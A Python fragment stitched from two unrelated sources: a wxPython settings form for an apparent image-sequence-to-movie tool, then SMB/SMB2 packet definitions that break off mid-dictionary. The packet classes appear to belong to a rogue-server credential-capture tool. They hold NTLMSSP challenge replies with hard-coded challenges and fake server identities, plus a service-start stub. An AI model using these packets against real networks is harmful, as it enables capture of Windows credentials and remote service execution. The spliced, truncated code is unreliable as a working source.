def __init__(self, parent, refid=None, data={}): self.initComplete = False settings = data.get('settings', {}) inputs = data.get('inputs', {}) presetsFolder = data.get('presetsFolder', None) self.recentSettings = [] self.outputPresets = ['Choose an output preset...'] self.loadPresets(presetsFolder) baseDefaults = { 'outputPreset': self.outputPresets[0], 'selfContained': True, 'smartUpdate': True, 'fillMissing': False, 'interval': 3, 'unit': 'Days', 'printtasks': 5, 'jobdrop': 'Copy Job to Queue', 'recentSettings': 'None' } self._form = { 'Parts': OrderedDict([ ('General', [[({ 'type': 'StaticText', 'label': 'Image Sequence', 'name': 'imageSequenceLabel' }, { 'type': 'wx.lib.filebrowsebutton.FileBrowseButtonWithHistory', 'name': 'imageSequence', 'labelText': '', 'flags': wx.EXPAND | wx.ALL, 'changeCallback': self.onSequenceUpdate }), ({ 'type': 'StaticText', 'label': 'Recent Settings' }, { 'type': 'ComboBox', 'name': 'recentSettings', 'colGrowable': True, 'flags': wx.EXPAND | wx.ALL, 'style': wx.CB_READONLY }), ({ 'type': 'StaticText', 'label': 'Frame Range', 'name': 'frameRangeLabel' }, { 'type': 'TextCtrl', 'name': 'frameRange', 'flags': wx.EXPAND | wx.ALL }), ({ 'type': 'StaticText', 'label': 'Audio File' }, { 'type': 'wx.lib.filebrowsebutton.FileBrowseButtonWithHistory', 'name': 'audioFile', 'labelText': '', 'fileMask': 'Wave Files (*.wav)|*.wav', 'flags': wx.EXPAND | wx.ALL }), ({ 'type': 'StaticText', 'label': 'Output Preset', 'name': 'outputPresetLabel' }, { 'type': 'ComboBox', 'name': 'outputPreset', 'colGrowable': True, 'flags': wx.EXPAND | wx.ALL, 'style': wx.CB_READONLY }), ({ 'type': 'StaticText', 'label': 'Output Movie', 'name': 'outputMovieLabel' }, { 'type': 'FilePickerCtrl', 'name': 'outputMovie', 'wildcard': 'Quicktime Movie (*.mov)|*.mov', 'style': wx.FLP_SAVE | wx.FLP_OVERWRITE_PROMPT | wx.FLP_USE_TEXTCTRL, 'flags': wx.EXPAND | wx.ALL })]]), ('Advanced', [{ 'type': 'CheckBox', 'name': 'selfContained', 'label': 'Self-contained' }, { 'type': 'CheckBox', 'name': 'smartUpdate', 'label': 'Only update what\'s changed' }, { 'type': 'CheckBox', 'name': 'fillMissingFrames', 'label': 'Fill in missing frames.' }]), ]), 'Options': { 'outputPreset': self.outputPresets, 'unit': ['Hours', 'Days', 'Months'], 'jobdrop': ['Copy Job to Queue', 'Move Job to Queue'], 'recentSettings': ['None'] }, 'Defaults': dict(baseDefaults.items() + settings.items()) } Form.__init__(self, parent) if settings.has_key('imageSequence'): self.loadRecentSettings(settings['imageSequence']) self.applyRecentSetting() self.loadInputs(inputs) self.initComplete = True
class SMBDCESVCCTLStartService(Packet): fields = OrderedDict([ ("ContextHandle", ""), ("MaxCount", "\x00\x00\x00\x00\x00\x00\x00\x00"), ])
class EthARP(Packet): fields = OrderedDict([ ("DstMac", "\xff\xff\xff\xff\xff\xff"), ("SrcMac", ""), ("Type", "\x08\x06"), #ARP ])
class SMB2NegoAns(Packet): fields = OrderedDict([ ("Len", "\x41\x00"), ("Signing", "\x01\x00"), ("Dialect", "\xff\x02"), ("Reserved", "\x00\x00"), ("Guid", "\xea\x85\xab\xf1\xea\xf6\x0c\x4f\x92\x81\x92\x47\x6d\xeb\x72\xa9"), ("Capabilities", "\x07\x00\x00\x00"), ("MaxTransSize", "\x00\x00\x10\x00"), ("MaxReadSize", "\x00\x00\x10\x00"), ("MaxWriteSize", "\x00\x00\x10\x00"), ("SystemTime", NTStamp(datetime.now())), ("BootTime", "\x22\xfb\x80\x01\x40\x09\xd2\x01"), ("SecBlobOffSet", "\x80\x00"), ("SecBlobLen", "\x78\x00"), ("Reserved2", "\x4d\x53\x53\x50"), ("InitContextTokenASNId", "\x60"), ("InitContextTokenASNLen", "\x76"), ("ThisMechASNId", "\x06"), ("ThisMechASNLen", "\x06"), ("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"), ("SpNegoTokenASNId", "\xA0"), ("SpNegoTokenASNLen", "\x6c"), ("NegTokenASNId", "\x30"), ("NegTokenASNLen", "\x6a"), ("NegTokenTag0ASNId", "\xA0"), ("NegTokenTag0ASNLen", "\x3c"), ("NegThisMechASNId", "\x30"), ("NegThisMechASNLen", "\x3a"), ("NegThisMech1ASNId", "\x06"), ("NegThisMech1ASNLen", "\x0a"), ("NegThisMech1ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e"), ("NegThisMech2ASNId", "\x06"), ("NegThisMech2ASNLen", "\x09"), ("NegThisMech2ASNStr", "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"), ("NegThisMech3ASNId", "\x06"), ("NegThisMech3ASNLen", "\x09"), ("NegThisMech3ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"), ("NegThisMech4ASNId", "\x06"), ("NegThisMech4ASNLen", "\x0a"), ("NegThisMech4ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"), ("NegThisMech5ASNId", "\x06"), ("NegThisMech5ASNLen", "\x0a"), ("NegThisMech5ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"), ("NegTokenTag3ASNId", "\xA3"), ("NegTokenTag3ASNLen", "\x2a"), ("NegHintASNId", "\x30"), ("NegHintASNLen", "\x28"), ("NegHintTag0ASNId", "\xa0"), ("NegHintTag0ASNLen", "\x26"), ("NegHintFinalASNId", "\x1b"), ("NegHintFinalASNLen", "\x24"), ("NegHintFinalASNStr", "*****@*****.**"), ("Data", ""), ]) def calculate(self): StructLen = str(self.fields["Len"]) + str( self.fields["Signing"] ) + str(self.fields["Dialect"]) + str(self.fields["Reserved"]) + str( self.fields["Guid"]) + str(self.fields["Capabilities"]) + str( self.fields["MaxTransSize"]) + str( self.fields["MaxReadSize"]) + str( self.fields["MaxWriteSize"]) + str( self.fields["SystemTime"]) + str( self.fields["BootTime"]) + str( self.fields["SecBlobOffSet"]) + str( self.fields["SecBlobLen"]) + str( self.fields["Reserved2"]) SecBlobLen = str(self.fields["InitContextTokenASNId"]) + str( self.fields["InitContextTokenASNLen"] ) + str(self.fields["ThisMechASNId"]) + str( self.fields["ThisMechASNLen"] ) + str(self.fields["ThisMechASNStr"]) + str( self.fields["SpNegoTokenASNId"] ) + str(self.fields["SpNegoTokenASNLen"]) + str( self.fields["NegTokenASNId"]) + str( self.fields["NegTokenASNLen"]) + str( self.fields["NegTokenTag0ASNId"]) + str( self.fields["NegTokenTag0ASNLen"]) + str( self.fields["NegThisMechASNId"]) + str( self.fields["NegThisMechASNLen"]) + str( self.fields["NegThisMech1ASNId"]) + str( self.fields["NegThisMech1ASNLen"] ) + str( self.fields["NegThisMech1ASNStr"] ) + str( self.fields["NegThisMech2ASNId"] ) + str( self.fields["NegThisMech2ASNLen"] ) + str( self.fields["NegThisMech2ASNStr"] ) + str( self.fields["NegThisMech3ASNId"] ) + str( self.fields["NegThisMech3ASNLen"] ) + str( self.fields["NegThisMech3ASNStr"] ) + str( self.fields["NegThisMech4ASNId"] ) + str( self.fields["NegThisMech4ASNLen"] ) + str( self.fields["NegThisMech4ASNStr"] ) + str( self.fields["NegThisMech5ASNId"] ) + str( self.fields["NegThisMech5ASNLen"] ) + str( self.fields["NegThisMech5ASNStr"] ) + str( self.fields["NegTokenTag3ASNId"] ) + str( self.fields["NegTokenTag3ASNLen"] ) + str(self.fields["NegHintASNId"]) + str( self.fields["NegHintASNLen"]) + str( self.fields["NegHintTag0ASNId"] ) + str( self.fields["NegHintTag0ASNLen"] ) + str( self.fields["NegHintFinalASNId"] ) + str( self.fields["NegHintFinalASNLen"] ) + str( self.fields["NegHintFinalASNStr"]) AsnLenStart = str(self.fields["ThisMechASNId"]) + str( self.fields["ThisMechASNLen"] ) + str(self.fields["ThisMechASNStr"]) + str( self.fields["SpNegoTokenASNId"] ) + str(self.fields["SpNegoTokenASNLen"]) + str( self.fields["NegTokenASNId"] ) + str(self.fields["NegTokenASNLen"]) + str( self.fields["NegTokenTag0ASNId"]) + str( self.fields["NegTokenTag0ASNLen"]) + str( self.fields["NegThisMechASNId"]) + str( self.fields["NegThisMechASNLen"]) + str( self.fields["NegThisMech1ASNId"]) + str( self.fields["NegThisMech1ASNLen"]) + str( self.fields["NegThisMech1ASNStr"]) + str( self.fields["NegThisMech2ASNId"] ) + str( self.fields["NegThisMech2ASNLen"] ) + str( self.fields["NegThisMech2ASNStr"] ) + str( self.fields["NegThisMech3ASNId"] ) + str( self.fields["NegThisMech3ASNLen"] ) + str( self.fields["NegThisMech3ASNStr"] ) + str( self.fields["NegThisMech4ASNId"] ) + str( self.fields["NegThisMech4ASNLen"] ) + str( self.fields["NegThisMech4ASNStr"] ) + str( self.fields["NegThisMech5ASNId"] ) + str( self.fields["NegThisMech5ASNLen"] ) + str( self.fields["NegThisMech5ASNStr"] ) + str( self.fields["NegTokenTag3ASNId"] ) + str( self.fields["NegTokenTag3ASNLen"] ) + str(self.fields["NegHintASNId"]) + str( self.fields["NegHintASNLen"]) + str( self.fields["NegHintTag0ASNId"] ) + str( self.fields["NegHintTag0ASNLen"] ) + str( self.fields["NegHintFinalASNId"] ) + str( self.fields["NegHintFinalASNLen"] ) + str( self.fields["NegHintFinalASNStr"]) AsnLen2 = str(self.fields["NegTokenASNId"]) + str( self.fields["NegTokenASNLen"] ) + str(self.fields["NegTokenTag0ASNId"]) + str( self.fields["NegTokenTag0ASNLen"] ) + str(self.fields["NegThisMechASNId"]) + str( self.fields["NegThisMechASNLen"] ) + str(self.fields["NegThisMech1ASNId"]) + str( self.fields["NegThisMech1ASNLen"]) + str( self.fields["NegThisMech1ASNStr"]) + str( self.fields["NegThisMech2ASNId"]) + str( self.fields["NegThisMech2ASNLen"]) + str( self.fields["NegThisMech2ASNStr"]) + str( self.fields["NegThisMech3ASNId"]) + str( self.fields["NegThisMech3ASNLen"]) + str( self.fields["NegThisMech3ASNStr"] ) + str( self.fields["NegThisMech4ASNId"] ) + str( self.fields["NegThisMech4ASNLen"] ) + str( self.fields["NegThisMech4ASNStr"] ) + str( self.fields["NegThisMech5ASNId"] ) + str( self.fields["NegThisMech5ASNLen"] ) + str( self.fields["NegThisMech5ASNStr"] ) + str( self.fields["NegTokenTag3ASNId"] ) + str( self.fields["NegTokenTag3ASNLen"] ) + str(self.fields["NegHintASNId"]) + str( self.fields["NegHintASNLen"]) + str( self.fields["NegHintTag0ASNId"] ) + str( self.fields["NegHintTag0ASNLen"] ) + str( self.fields["NegHintFinalASNId"] ) + str( self.fields["NegHintFinalASNLen"] ) + str( self.fields["NegHintFinalASNStr"]) MechTypeLen = str(self.fields["NegThisMechASNId"]) + str( self.fields["NegThisMechASNLen"] ) + str(self.fields["NegThisMech1ASNId"]) + str( self.fields["NegThisMech1ASNLen"] ) + str(self.fields["NegThisMech1ASNStr"]) + str( self.fields["NegThisMech2ASNId"] ) + str(self.fields["NegThisMech2ASNLen"]) + str( self.fields["NegThisMech2ASNStr"]) + str( self.fields["NegThisMech3ASNId"]) + str( self.fields["NegThisMech3ASNLen"]) + str( self.fields["NegThisMech3ASNStr"]) + str( self.fields["NegThisMech4ASNId"]) + str( self.fields["NegThisMech4ASNLen"]) + str( self.fields["NegThisMech4ASNStr"]) + str( self.fields["NegThisMech5ASNId"] ) + str( self.fields["NegThisMech5ASNLen"] ) + str(self.fields["NegThisMech5ASNStr"]) Tag3Len = str(self.fields["NegHintASNId"]) + str( self.fields["NegHintASNLen"]) + str( self.fields["NegHintTag0ASNId"]) + str( self.fields["NegHintTag0ASNLen"]) + str( self.fields["NegHintFinalASNId"]) + str( self.fields["NegHintFinalASNLen"]) + str( self.fields["NegHintFinalASNStr"]) #Sec Blob lens self.fields["SecBlobOffSet"] = struct.pack("<h", len(StructLen) + 64) self.fields["SecBlobLen"] = struct.pack("<h", len(SecBlobLen)) #ASN Stuff self.fields["InitContextTokenASNLen"] = struct.pack( "<B", len(SecBlobLen) - 2) self.fields["ThisMechASNLen"] = struct.pack( "<B", len(str(self.fields["ThisMechASNStr"]))) self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2)) self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2) - 2) self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen)) self.fields["NegThisMech1ASNLen"] = struct.pack( "<B", len(str(self.fields["NegThisMech1ASNStr"]))) self.fields["NegThisMech2ASNLen"] = struct.pack( "<B", len(str(self.fields["NegThisMech2ASNStr"]))) self.fields["NegThisMech3ASNLen"] = struct.pack( "<B", len(str(self.fields["NegThisMech3ASNStr"]))) self.fields["NegThisMech4ASNLen"] = struct.pack( "<B", len(str(self.fields["NegThisMech4ASNStr"]))) self.fields["NegThisMech5ASNLen"] = struct.pack( "<B", len(str(self.fields["NegThisMech5ASNStr"]))) self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len)) self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len) - 2) self.fields["NegHintTag0ASNLen"] = struct.pack("<B", len(Tag3Len) - 4) self.fields["NegHintFinalASNLen"] = struct.pack( "<B", len(str(self.fields["NegHintFinalASNStr"])))
class SMBSession1Data(Packet): fields = OrderedDict([ ("Wordcount", "\x04"), ("AndXCommand", "\xff"), ("Reserved", "\x00"), ("Andxoffset", "\x5f\x01"), ("Action", "\x00\x00"), ("SecBlobLen", "\xea\x00"), ("Bcc", "\x34\x01"), ("ChoiceTagASNId", "\xa1"), ("ChoiceTagASNLenOfLen", "\x81"), ("ChoiceTagASNIdLen", "\x00"), ("NegTokenTagASNId", "\x30"), ("NegTokenTagASNLenOfLen", "\x81"), ("NegTokenTagASNIdLen", "\x00"), ("Tag0ASNId", "\xA0"), ("Tag0ASNIdLen", "\x03"), ("NegoStateASNId", "\x0A"), ("NegoStateASNLen", "\x01"), ("NegoStateASNValue", "\x01"), ("Tag1ASNId", "\xA1"), ("Tag1ASNIdLen", "\x0c"), ("Tag1ASNId2", "\x06"), ("Tag1ASNId2Len", "\x0A"), ("Tag1ASNId2Str", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"), ("Tag2ASNId", "\xA2"), ("Tag2ASNIdLenOfLen", "\x81"), ("Tag2ASNIdLen", "\xED"), ("Tag3ASNId", "\x04"), ("Tag3ASNIdLenOfLen", "\x81"), ("Tag3ASNIdLen", "\xEA"), ("NTLMSSPSignature", "NTLMSSP"), ("NTLMSSPSignatureNull", "\x00"), ("NTLMSSPMessageType", "\x02\x00\x00\x00"), ("NTLMSSPNtWorkstationLen", "\x1e\x00"), ("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"), ("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"), ("NTLMSSPNtNegotiateFlags", "\x15\x82\x89\xe2"), ("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"), ("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), ("NTLMSSPNtTargetInfoLen", "\x94\x00"), ("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"), ("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"), ("NegTokenInitSeqMechMessageVersionHigh", "\x05"), ("NegTokenInitSeqMechMessageVersionLow", "\x02"), ("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"), ("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"), ("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"), ("NTLMSSPNtWorkstationName", "SMB12"), ("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"), ("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"), ("NTLMSSPNTLMChallengeAVPairsUnicodeStr", "smb12"), ("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"), ("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"), ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", "SERVER2008"), ("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"), ("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"), ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", "smb12.local"), ("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"), ("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"), ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", "SERVER2008.smb12.local"), ("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"), ("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"), ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", "smb12.local"), ("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"), ("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"), ("NTLMSSPNTLMPadding", ""), ("NativeOs", "Windows Server 2003 3790 Service Pack 2"), ("NativeOsTerminator", "\x00\x00"), ("NativeLAN", "Windows Server 2003 5.2"), ("NativeLANTerminator", "\x00\x00"), ]) def calculate(self): ##Convert strings to Unicode first... self.fields["NTLMSSPNtWorkstationName"] = self.fields[ "NTLMSSPNtWorkstationName"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le') self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le') self.fields["NativeLAN"] = self.fields["NativeLAN"].encode('utf-16le') ###### SecBlobLen Calc: AsnLen = str(self.fields["ChoiceTagASNId"]) + str( self.fields["ChoiceTagASNLenOfLen"] ) + str(self.fields["ChoiceTagASNIdLen"]) + str( self.fields["NegTokenTagASNId"] ) + str(self.fields["NegTokenTagASNLenOfLen"]) + str( self.fields["NegTokenTagASNIdLen"] ) + str(self.fields["Tag0ASNId"]) + str( self.fields["Tag0ASNIdLen"]) + str( self.fields["NegoStateASNId"]) + str( self.fields["NegoStateASNLen"]) + str( self.fields["NegoStateASNValue"]) + str( self.fields["Tag1ASNId"]) + str( self.fields["Tag1ASNIdLen"]) + str( self.fields["Tag1ASNId2"]) + str( self.fields["Tag1ASNId2Len"]) + str( self.fields["Tag1ASNId2Str"] ) + str(self.fields["Tag2ASNId"]) + str( self.fields["Tag2ASNIdLenOfLen"] ) + str( self.fields["Tag2ASNIdLen"] ) + str( self.fields["Tag3ASNId"] ) + str( self.fields["Tag3ASNIdLenOfLen"] ) + str(self.fields["Tag3ASNIdLen"]) CalculateSecBlob = str(self.fields["NTLMSSPSignature"]) + str( self.fields["NTLMSSPSignatureNull"] ) + str(self.fields["NTLMSSPMessageType"]) + str( self.fields["NTLMSSPNtWorkstationLen"] ) + str(self.fields["NTLMSSPNtWorkstationMaxLen"]) + str( self.fields["NTLMSSPNtWorkstationBuffOffset"] ) + str(self.fields["NTLMSSPNtNegotiateFlags"]) + str( self.fields["NTLMSSPNtServerChallenge"] ) + str(self.fields["NTLMSSPNtReserved"]) + str( self.fields["NTLMSSPNtTargetInfoLen"]) + str( self.fields["NTLMSSPNtTargetInfoMaxLen"]) + str( self.fields["NTLMSSPNtTargetInfoBuffOffset"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionHigh"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionBuilt"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"] ) + str(self.fields["NTLMSSPNtWorkstationName"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairsId"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairsLen"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairs1Id"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs2Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs3Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs5Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs6Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) ##### Bcc len BccLen = AsnLen + CalculateSecBlob + str( self.fields["NTLMSSPNTLMPadding"]) + str( self.fields["NativeOs"]) + str( self.fields["NativeOsTerminator"]) + str( self.fields["NativeLAN"]) + str( self.fields["NativeLANTerminator"]) #SecBlobLen self.fields["SecBlobLen"] = struct.pack("<h", len(AsnLen + CalculateSecBlob)) self.fields["Bcc"] = struct.pack("<h", len(BccLen)) self.fields["ChoiceTagASNIdLen"] = struct.pack( ">B", len(AsnLen + CalculateSecBlob) - 3) self.fields["NegTokenTagASNIdLen"] = struct.pack( ">B", len(AsnLen + CalculateSecBlob) - 6) self.fields["Tag1ASNIdLen"] = struct.pack( ">B", len( str(self.fields["Tag1ASNId2"]) + str(self.fields["Tag1ASNId2Len"]) + str(self.fields["Tag1ASNId2Str"]))) self.fields["Tag1ASNId2Len"] = struct.pack( ">B", len(str(self.fields["Tag1ASNId2Str"]))) self.fields["Tag2ASNIdLen"] = struct.pack( ">B", len(CalculateSecBlob + str(self.fields["Tag3ASNId"]) + str(self.fields["Tag3ASNIdLenOfLen"]) + str(self.fields["Tag3ASNIdLen"]))) self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob)) ###### Andxoffset calculation. CalculateCompletePacket = str(self.fields["Wordcount"]) + str( self.fields["AndXCommand"]) + str(self.fields["Reserved"]) + str( self.fields["Andxoffset"]) + str(self.fields["Action"]) + str( self.fields["SecBlobLen"]) + str( self.fields["Bcc"]) + BccLen self.fields["Andxoffset"] = struct.pack( "<h", len(CalculateCompletePacket) + 32) ###### Workstation Offset CalculateOffsetWorkstation = str( self.fields["NTLMSSPSignature"] ) + str(self.fields["NTLMSSPSignatureNull"]) + str( self.fields["NTLMSSPMessageType"] ) + str(self.fields["NTLMSSPNtWorkstationLen"]) + str( self.fields["NTLMSSPNtWorkstationMaxLen"] ) + str(self.fields["NTLMSSPNtWorkstationBuffOffset"]) + str( self.fields["NTLMSSPNtNegotiateFlags"] ) + str(self.fields["NTLMSSPNtServerChallenge"]) + str( self.fields["NTLMSSPNtReserved"]) + str( self.fields["NTLMSSPNtTargetInfoLen"]) + str( self.fields["NTLMSSPNtTargetInfoMaxLen"] ) + str( self.fields["NTLMSSPNtTargetInfoBuffOffset"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionHigh"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionBuilt"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) ###### AvPairs Offset CalculateLenAvpairs = str( self.fields["NTLMSSPNTLMChallengeAVPairsId"] ) + str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] ) + str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] ) + str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"]) + ( self.fields["NTLMSSPNTLMChallengeAVPairs2Id"] ) + str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs3Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs3Len"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs5Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs5Len"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"]) + ( self.fields["NTLMSSPNTLMChallengeAVPairs6Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) ##### Workstation Offset Calculation: self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack( "<i", len(CalculateOffsetWorkstation)) self.fields["NTLMSSPNtWorkstationLen"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNtWorkstationName"]))) self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNtWorkstationName"]))) ##### IvPairs Offset Calculation: self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack( "<i", len(CalculateOffsetWorkstation + str(self.fields["NTLMSSPNtWorkstationName"]))) self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack( "<h", len(CalculateLenAvpairs)) self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack( "<h", len(CalculateLenAvpairs)) ##### IvPair Calculation: self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"]))) self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"]))) self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"]))) self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"]))) self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
class SMBNegoData(Packet): fields = OrderedDict([ ("BuffType", "\x02"), ("Dialect", "NT LM 0.12\x00"), ])
class SMB2Session1Data(Packet): fields = OrderedDict([ ("Len", "\x09\x00"), ("SessionFlag", "\x01\x00"), ("SecBlobOffSet", "\x48\x00"), ("SecBlobLen", "\x06\x01"), ("ChoiceTagASNId", "\xa1"), ("ChoiceTagASNLenOfLen", "\x82"), ("ChoiceTagASNIdLen", "\x01\x02"), ("NegTokenTagASNId", "\x30"), ("NegTokenTagASNLenOfLen", "\x81"), ("NegTokenTagASNIdLen", "\xff"), ("Tag0ASNId", "\xA0"), ("Tag0ASNIdLen", "\x03"), ("NegoStateASNId", "\x0A"), ("NegoStateASNLen", "\x01"), ("NegoStateASNValue", "\x01"), ("Tag1ASNId", "\xA1"), ("Tag1ASNIdLen", "\x0c"), ("Tag1ASNId2", "\x06"), ("Tag1ASNId2Len", "\x0A"), ("Tag1ASNId2Str", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"), ("Tag2ASNId", "\xA2"), ("Tag2ASNIdLenOfLen", "\x81"), ("Tag2ASNIdLen", "\xE9"), ("Tag3ASNId", "\x04"), ("Tag3ASNIdLenOfLen", "\x81"), ("Tag3ASNIdLen", "\xE6"), ("NTLMSSPSignature", "NTLMSSP"), ("NTLMSSPSignatureNull", "\x00"), ("NTLMSSPMessageType", "\x02\x00\x00\x00"), ("NTLMSSPNtWorkstationLen", "\x1e\x00"), ("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"), ("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"), ("NTLMSSPNtNegotiateFlags", "\x15\x82\x89\xe2"), ("NTLMSSPNtServerChallenge", "\x82\x21\x32\x14\x51\x46\xe2\x83"), ("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), ("NTLMSSPNtTargetInfoLen", "\x94\x00"), ("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"), ("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"), ("NegTokenInitSeqMechMessageVersionHigh", "\x06"), ("NegTokenInitSeqMechMessageVersionLow", "\x03"), ("NegTokenInitSeqMechMessageVersionBuilt", "\x80\x25"), ("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"), ("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"), ("NTLMSSPNtWorkstationName", "SMB3"), ("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"), ("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"), ("NTLMSSPNTLMChallengeAVPairsUnicodeStr", "SMB5"), ("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"), ("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"), ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", "WIN-PRH502RQAFV"), 